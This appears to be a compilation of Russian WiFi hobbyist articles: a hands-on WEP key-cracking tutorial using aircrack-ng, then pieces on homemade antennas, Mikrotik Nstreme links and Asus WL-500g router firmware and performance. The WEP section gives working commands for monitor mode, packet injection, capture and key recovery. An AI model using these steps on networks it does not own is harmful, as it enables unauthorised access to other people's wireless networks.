Протокол защиты беспроводных сетей WEP является самой "шумной" ошибкой проектирования средств защиты 20 века. Существует огромное количество методов атак, и утилит позволяющих за считанные минуты получить ключ шифрования, расшифровывать отдельные пакеты или внедрять фреймы в беспроводную сеть, защищенную с помощью WEP. В связи с этим сети, использующие этот протокол, практически не встречаются в корпоративном секторе.

          В сети существует много матриалов по этому поводу. Попробуем их немного систематизировать, и описать практическое применение. 

          ВНИМАНИЕ!!! Вся информация изложеная в данной статье дана ТОЛЬКО в образовательных целях!!! Автор не несет никакой отвественности за вред причененный использованием материалов изложенных в данной статье!! Эксперементируйте только на своих сетях, а если решили попробовать на чужой, не забудте взять разрешение у хозяина сети! И помните: уголовный кодекс еще никто не отменял! :)

          Здесь мы рассмотрим статический метод подбора ключа, с использованием набора утилит aircrack-ng.  

          Основным моментом является выбор "правильной" беспроводной карты и "правильных" (пропатченых) драйверов к ней.  Так как не все карты одинаково хороши для нашей задачи. 

          Данный метод протестирован мной с использовнием  PCI сетевых карт:

             D-Link DWL-510  на чипсете RaLink RT2561/RT61 rev B. 802.11g

             Senao                     на чипсете Atheros AR5212/AR5213

             И нетбука Asus eeePC 701 4G, с картой Atheros AR242x 802.11abg на борту. 

          Существуют небольшие отличия при использованиии всех этих карт но сама суть остается таже.  

          В качестве платформы мы будем использовать Ubuntu Linux 8.04LTS Server Edition.  

          Для начала разберемся с патчами для драйверов наших карт. 

          И тут нас ждет приятный сюрприз. Для карт на чипсетах RaLink в Ubuntu используться драйвера rt2x00 котрые НЕ ТРЕБУЮТ никаких патчей! Они уже умеют делать injection сразу "из коробки"!

          С Atheros чуть сложнее но тоже ничего страшного. Будем использовать драйвера madwifi-ng и патч к ним:

          ifconfig ath0 down

          ifconfig wifi0 down

          svn -r 3925 checkout http://svn.madwifi-project.org/madwifi/trunk/ madwifi-ng

          cd madwifi-ng

          wget http://patches.aircrack-ng.org/madwifi-ng-r3925.patch

          patch -N -p 0 -i madwifi-ng-r3925.patch

          ./scripts/madwifi-unload

          make

          make install

          depmod -ae

          modprobe ath_pci

      Драйвера установлены и работают. Проверяем: lsmod . 

      Теперь установим aircrack-ng:

          apt-get install aircrack-ng

Далее для карты Atheros AR5212/AR5213:

              airmon-ng ath0 stop 

              airmon-ng start wifi0 10 

     Это переводит карту в режим монтиторинга на 10 канале WiFi. 

Для карты на RaLink RT2561/RT61:

              ifconfig wlan1 down

              iwconfig wlan1 mode Monitor channel 10

      Мониторим 10 канал.

Для карты Atheros AR242x  используемой в Asus eeePC:

      В Asus eeePC 701 4G используеться Atheros 242x которая  по умолчанию не завелась в Ubuntu 8.04. Драйвера для нее берем тут: 

http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-old.tar.bz2. Распаковываем, потом make\ make install \ make load. Загружаеться модуль ath5k.  ath5k не требуют патчей и уже умеют инджектинг. Переводим карту в режим мониторинга: 

      ifconfig ath0 down 

      iwconfig ath0 mode Monitor channel 10

      На этом различия для карт на разных чипсетах заканчиваються, дальнешие действия одинаковы для всех карт. 

      Делаем тест инджектинга:

            aireplay-ng [имя интерфейса] -9 

     Кстати инджектинг может иногда и не работать но подбор ключа WEP при этом всеравно возможен. 

      Запускаем сбор пакетов: 

           airodump-ng -c 10 --bssid 00:AA:00:AA:00:AA -w packets ath0 

           где  -c 10 - номер канала 

                   --bssid 00:AA:00:AA:00:AA - BSSID нашей точки доступа 

                   -w packet - пишем все в файл packets 

                   -ath0  - интерфейс 

       Видим на экране как происходит сбор пакетов. Для подбора 64-битного ключа нам нужно гдето примерно 40000 пакетов, для 128-битного от 40000 до примерно 85000 пакетов в колонке DATA. 

       Теперь сам подбор: 

             aircrack-ng -z -b 00:AA:00:AA:00:AA packets*.cap 

       Через некоторое время наблюдаем чтото подобное: 

                                                       Aircrack-ng 0.9

                              [00:03:06] Tested 674449 keys (got 96610 IVs)

                                                               [....]

                                     KEY FOUND! [ 12:34:56:78:90 ] 

        Это и есть наш ключ WEP! :) 

 Прошивки  для беспроводного маршрутизатора Asus WL-500g Premium от Олега версии 1.9.2.7-9, 1.9.2.7-8, 1.9.2.7-7, 1.9.2.7-7f.

          Ну конечно  купить антенну порой не под силу даже не очень бедным, ибо цена часто зашкаливает за 100 у.е. Но ничего , если руки прямые то сие чудо можно изготовить и самому , очень полезен ресурс www.lan23.ru , настоятельно рекомендую . Основной силой  этой антенны является ее простота геометрических форм при изготовлении и короткозамкнутость по постояному току ( бережет входые цепи точки доступа от статических разрядов електричества ) да и усиление антенны 20 дБ что весьма немало .

        Оригинал статей по изготовлению нходится http://lan23.ru/wifi/fa20.html  и здесь ttp://sterr.narod.ru/wifi/fa20.htm http://www.comptek.ru/box/wireless/technology/1453

       Применение выносных антенн в WiFi диапазаноне наверное самый ответственный момент связанный с качеством, дальнобойностью и скоростьюв созданном линке . К сожалению 99 процентов начинающих "вайфайщиков" абсолютно не имеют базового образования в области антенно-фидерного хозяйства , хотя данный предмет преподается в вузах среднего и высшего технического образования на протяжении многих часов начитки . В этом аспекте я с благодарностью могу вспомнить своих преподавателей , в частности Седлецкого В.С., ибо данная наука дается очень тяжело особенно исходя из математических выкладок . И очень смешно порой слышать от очередного кулибина о фантастической антенне с коэфициентом усиления в 100 дБ !

         Если перейти к реалиям жизни , то можно прийти к выводу , что создание антенн  с коэфициентом усиления свыше 30 дБ просто нереально . Не стоит забывать что значения коефициента усиления в дБ имеет логарифмическую зависимость а не линейную , таким образом 20дБ это в 10 раз , а 40дБ - 100 раз ! Таким образом в принципе  в любой  простой  одно-двух елементных и т.п. антеннах можно довольно просто увеличивать коэфициент усиления добавляя елементы (вибраторы) , однако не все так сладко , каждый елемент будет вносить не только дополнительное усиление , а и расстраивать нашу антенну ,которая по своей сути представляет собой резонансную систему с определенной добротностью которая затем выливается в коэфициент усиления и полосу пропускания , заставляя вводить согласующие елементы в конструкцию антенны в целом .

        Таким образом на определенном этапе , когда колличество елементов антенны начинает превышать десяток елементов их количество просто перестает давать какие либо результаты .  Не стоит забывать , что применяя антенны с усилением порядка 20-24 дБ мы получем очень низкую полосу частот , для которой эта антенна будет находиться в резонансе . Таким образом можно попасть в просак выстроив сие чудо на 1 канал диапазона и перейдя с оного расстроится скажем на 12 канале , для которого эта антенна может быть уже давно не в резонансе .

         В общем и целом антенны можно разделить по диаграмме направленности (ДН) на направленные и круговые . В общем и целом конструкций направленных антенн есть достаточно большое количество (волновой канал , спиральные , параболические , панельные ) , чего нельзя сказать о круговых .

         В WiFi  диапазоне в качестве антенн с круговой ДН применяются практически только колинеарные антенны , которые имеют коефициент усиления порядка до 7-14 дБ . Причем 14 дБ является практически потолком для сией конструкции , которая в своем финише представляет собой визуально штырь длинной иногда до 1 метра .

        Для повторения колинеарная антенна очень сложна в разрезе ее настройки и очень капризна . Направленных антенн есть великое множество и как правило повторение оных при соблюдении геометрических размеров не составляет труда . Габариты например паннельных антенн для диапазона 2.4 ГГц с коефициентом усиления порядка 20 дБ вписываются обычно в 200*400*30 мм или тому подобные .

        Особое внимание следует уделить вопросу прямой видимости , поскольку данный диапазон волн абсолютно не склонен к огибанию препятствий , а затухание в строительных и естественных препятствиях (деревья и их листья) практически не дает возможности осуществлять связь внутри помещений через перестенки итп.итд. далее 50-100 метров . Не решает этих проблемм и наращивание мощности передатчика WiFi устройства . Теоретически для увеличения дальности в городской местности в 2 раза мощность передатчика приходится увеличивать всего того навсего в 10 раз ! (опыт применения диапазона 27 МГц в городских условиях , где дяди используют усилители ват по 100-300 Вт это при разрешенных 5 Вт!!). Однако применеие мощностей более 100 мВт при дальности линков до 5-10 км просто не оправдано  и грозит только увеличеннием уровня шума в канале , что приведет к печальным последствиям вроде как и уровень сигнала отличный, а скорость линка почемуто подозрительно низкая .

       Зачастую приходится убавлять мощность передатчика,балансируя на мощности сигнала и пропускной способности линка. Немаловажным условием является также свобода от препятствий в зоне Френнеля , что также не всегда получается , хотя вроде как точки установки антенн имееют оптическую видимость, но псередине пути имеется некое строение примерно такой же высоты (неплохо приобрести или взять в долг например подзорную трубу так надежней ...)

        Немалой проблемой есть и коаксиальные кабеля , затухания в которых очень значительные . Так применив фидер длиной порядка 15-20 метров мы можем потерять все что приобрели с помощью применения выносной антенны. До недавних пор панацеей применения был коаксиал совкового и китайского  производства RG-58 , однако данный фидер стоит применять в крайних случаях и на минимальных длинах , поскольку затухание в нем космическое , а 2.4 ГГц является по сути граничной частотой применения . Стоит обратить внимание на коаксиалы бренда Belden или аналогичные специально разработанные для данного диапазона . В последнее время мы применяли китайские кабеля на которых явным образом указывалась рабочая частота и стоимость не превышала 1 доллара за погонный метр .

        Поскольку как правило разьемы на точках доступа имею разьем типа RS-SMA , который не позволяет напрямую призвести подпайку кабеля по причине большого диаметра (от 6 до 13 мм в диамтре обыно) , применяют так называемые  Pigtail (переходник с одного типа разьема на дргой длиной примерно 30-50 см ) . Для прямой установки на  кабель разьема типа  RS-SMA  необходм также и специальный обжимной инструмент , который стоит пару десятков долларов , народ наш правда изголяется с помощью плоскогубцев что не есть конечно равильно .

И снова RouterOS Mikrotik . Эта разностороняя ОС является по сути золотым топором  при решении задач в сетях малого и среднего масштаба , хотя размер сети вещь относительная . Рассмотрение Mikrotik в разрезе WiFi роутера интесесно прежде всего наличием режима Nstreme  и Nstreme2 .

Почитать о данных режимах работы можно на сайте www.mikrotik.com однако только на на английском языке , что не всем под силу . Приемущества протокола Nstreme:
1.Клиентский последовательный опрос. Последовательный опрос сокращает время для доступа, потому что плате не надо гарантировать каждый раз , что радиочастотное пространство является "свободным", когда необходимо передавать данные(механизм последовательного опроса заботится об этом)
2.Очень низкий протокол свыше рамок позволяющий супервысокие скорости передачи данных

По сути протокол Nstream в чистом виде нас не очень интересует , поскольку подразумевает линк пропускной споосбностью до 35 мбит и призван решить проблеммы больших таймаутов на длинных линках , думаю многие наблюдали громадные пинги на радиолинках при вобщем то вроде  незагруженом радио канале , хотя конечно может комуто и хватит . Nstream Dual использует сразу 2 радиокарты с каждой из сторон линка при этом видно из рисунка , что одна работает на прием , другая на передачу . Таким образом практическая возможность  линка по TCP возрастает до 75 мбит . Не стоит путать скорость физики служебных пакетов радиолинка и реальную пропускную способность по ТСР , которая в обычных устройствах стандарта G 54 мбит составляет по ТСР всего примерно 22 мбит при самых лучших раскладах. Для платформ RouteBOARD c разьемами miniPCI Mikrotik рекомендует использовать карточки WiFi типа R52 и R52H , которые внешне практически одинаковы , но имеют разную выходную мощность и оптимизированны как заверяет Mikrotik для работы с протоколом Nstream.

Однако хочется заметить , что ничего революционного окромя возможности работы на нестандартных частотах сверху и снизу диапазона  в карточке R52 нет и подобную карточку , которая стоит немалых денег можно легко заменить на карточку производителя  TL-WN660G , TL-WN560G производителя TP-LINK , если вы строите обысную точку доступа  . Можно найти и других производителей , главное чтобы это был чипсет Atheros . Использование Nstream имеет и небольшие подводные камни , такие как ресурс процессора , поскольку он напрямую задействован в этом режиме . Mikrotik рекомендует использование процессора вообще так начиная с модели Celeron 700 и выше , однако платы RouterBOARD c таким процом обойдутся совсем недешево , например RB 433AH с 680 мегагерцовым  процом всего навсего примерно 200-240 вечнозеленых едениц 

Можно попробовать и RB433 c 300 мегагерцовым процом , внешний вид платы тот же  , однако вы рискуете увидеть загрузку под 100 процентов . Неприятным является и то , что придется в Nsreme Dual использовать пару антенн с каждой стороны . Да построение линка Nsteream Dual совсем не дешевое удовольсвие , однако получение почти 100 мегабитного линка и невозможность другого технического решения с применением меди или оптоволокна делает его в некоторых случаях просто единственным решением . Стоит также заметить что в стоимость плат RouteBOARD уже включена стоимость програмного обеспечения (для L4 это примерно 70 доллров) .

Конечно , если вы решите заиметь просто точку доступа то для этого будет достаточно и более дешевых плат , например RB 411A стоит приблизительно 130 долларов и является наверное идеальным решением для беспроводной точки доспупа , обслуживающей клиентов .

Очень привлекательным является также и то , что платы поддерживают удаленное питание по свободным парам  PoE , что позволяет установить точку доступа в непосредственной близости от антенны , по сути в одном корпусе , а питание подавать  по витой паре на расстояние вплоть до 100 метров . 

ASUS WL-500g Premium – это одна из самых удачных бепроводных точек SOHO сегмента . В корпусе этого устройства сосредоточены практически все функции, которые могут пригодиться при развертывании небольшой компьютерной сети, вплоть до организации на базе WL-500g Premium центра сетевых закачек, принт-сервера или публичного ftp-сервера. Этот роутер пришел на смену предыдущей модели, WL-500g Deluxe, которая была, без сомнения, очень успешной и завоевала широкую популярность. Очевидно, что требований к новой модели должно быть не меньше, а то и больше, чем к предыдущей. Если говорить о нововведениях, то их, по сравнению с моделью Deluxe, на первый взгляд не так уж и много: установлен более быстрый процессор, увеличен объем flash-памяти, а также добавлены новые функции – Download Master и EZSetup.

В комплект поставки роутера входит:

• Сам роутер
• Руководство пользователя на восьми языках
• Ethernet кабель пятой категории
• Внешний блок питания. Его основные характеристики: входное напряжение – 100-240V (50/60Hz), потребляемый от сети ток – 0.4A, выходное напряжение – 5V, выходной ток – 2.5A.
• CD c утилитами.
• Внешняя антенна.

Внешний вид девайса

Внутри роутера находятся две платы: основная и модуль WiFi. Последний представляет собой небольшую карту, которая вставляется на основной плате в слот miniPCI и позволяет заменить ее вслучае выхода из строя или обгрейде при  переходе на другой стандарт .

Возможности web-интерфейса

Прежде чем обсуждать возможности web-итерфейса управляющей программы, мы просто обязаны затронуть тему самой управляющей программы, а точнее – того блока данных, который "зашивается" во флэш-память роутера. Так вот, прошивка (firmware) – это, пожалуй, самая актуальная для WL-500g Premium проблема. Нет, конечно, нельзя сказать, что дела безнадежно плохи. Если пользователю хватает тех настроек, которые имеются в официальной прошивке (именно о них речь пойдет ниже), то, скорее всего, он не заметит каких-либо серьезных недостатков, но беда в том, что многим пользователям имеющихся стандартных возможностей не хватает (и небезосновательно). К счастью, описываемое устройство позволяет заменить (перепрошить) стандартную микропрограмму на альтернативную, разработанную сторонними программистами-энтузиастами. Благодаря этому функциональность маршрутизатора может быть расширена.

Случаев, когда у обладателей ASUS WL-500g Premium может возникнуть желание искать альтернативные прошивки, много, но их подавляющее большинство (во всяком случае, для некоторых стран, таких как, например, Россия) сводится к проблеме с PPTP (VPN) соединением и одновременным роутингом трафика в локальную сеть. Возможностей стандартной прошивки не хватает, когда пользователь подключен к локальной сети провайдера со статическим (или динамическим) IP адресом, а доступ к Интернет получает от того же провайдера при помощи VPN (PPTP) соединения, с выдачей отдельного внешнего динамического IP адреса. Хотя, конечно, это далеко не единственный повод, по которому пользователь может прибегнуть к неофициальным прошивкам. Например, некоторые микропрограммы дают возможность общаться с роутером через Telnet или SSH. А в этом случае открываются практически бесконечные (ограниченные только характеристиками аппаратной части) возможности – это и изменение любых параметров прошивки, установка новых приложений на роутер, написание своих сценариев и т.д., и т.п.Существует масса альтернативных прошивок к данной модели одна из которых называется OpenWRT. В этой прошивке реализован доступ к роутеру через Telnet, ну и, разумеется, имеются средства для решения проблем с VPN. Ну, и, наконец,  альтернативная прошивка написана энтузиастом, широко известным в узких кругах, как Oleg. Он выпускает собственные версии прошивок для некоторых моделей сетевого оборудования ASUS, включая и WL-500g Premium , он выкладывает на своем форуме AsusForum многочисленные версии   прошивок для этой модели роутера.  Прошивки от Олега зарекомендовали себя с лучшей стороны , с веб браузера они правда не предоставляют всех возможностей , в том числе отрезана возможность закачек торрентов как таковых вообще . А вот по SSH Telnet  можно творить чудеса , внутри Linux со всеми вытекающими возможностями установки , модификации, настройки ПО. Все это рассматривается на форуме у Олега.

В нашем разделе Файлы, лежат прошивки от Олега для Asus WL-500g Premium разных версий.

Производительность

Если говорить о производительности роутера, то основным критерием ее оценки является, несомненно, пропускная способность сетевых портов. В нашем же случае, к этому еще можно прибавить скорость работы встроенного FTP-сервера, а также скорость и дальность охвата беспроводного интерфейса. Так как это первый роутер подобного класса, оказавшийся в нашей лаборатории, и сравнивать результаты его тестов нам пока не с чем, мы будем комментировать все результаты исключительно субъективно.

Для тестирования скоростей сетевых соединений мы использовали известную программу IxChariot. Измерения проводились по простой схеме: нами были созданы несколько соединений "точка-точка", которые иллюстрировали бы разные варианты сетевых соединений.

Итак, для всех тестов нами было использовано следующее оборудование:

• Два Ethernet-кабеля пятой категории;
• Ноутбук на базе платформы Intel Centrino Duo;
• Система на базе материнской платы с Gigabit Ethernet контроллером;
• USB HDD Maxtor OneTouch 250GB.

Ниже мы приводим графики из IxChariot, полученные после применения сценария High Performance Throughput. Прокачка внутри локальной сети LAN-LAN

Прокачка из внешней сети во внутреннюю WAN-LAN:

Прокачка во внутренней сети с использованием WiFi интерфейса (в непосредственной близости от роутера). Измерялась скорость между системой, подключенной по кабелю и системой, с которой было установлено беспроводное соединение с использованием WPA шифрования:

Результаты получились впечатляющими, особенно с проводным соединением – они практически равны максимальной теоретической пропускной способности канала 100 Мбит/сек. Пропускная способность беспроводного интерфейса тоже находится на приемлемом уровне. Особенно, если учесть, что тут результат зависит в значительной мере от WiFi-модуля и антенны клиентского устройства.

Данный роутер очень неплохо себя зарекомендовал , правда их было несколько ревизий , в некоторых из них была проблемма с чувствительностью приемного тракта , которая решалась заменой резистора на радиокарте . К недостаткам применения данного роутера можно отнести приличное енергопотребление и отсутствие возможности удаленного питания . Както раз подвел и внешний импульсный источник , закипел выходной конденсатор фильтра , расположенный в непосредственной близости от радиатора выпрямительного диода .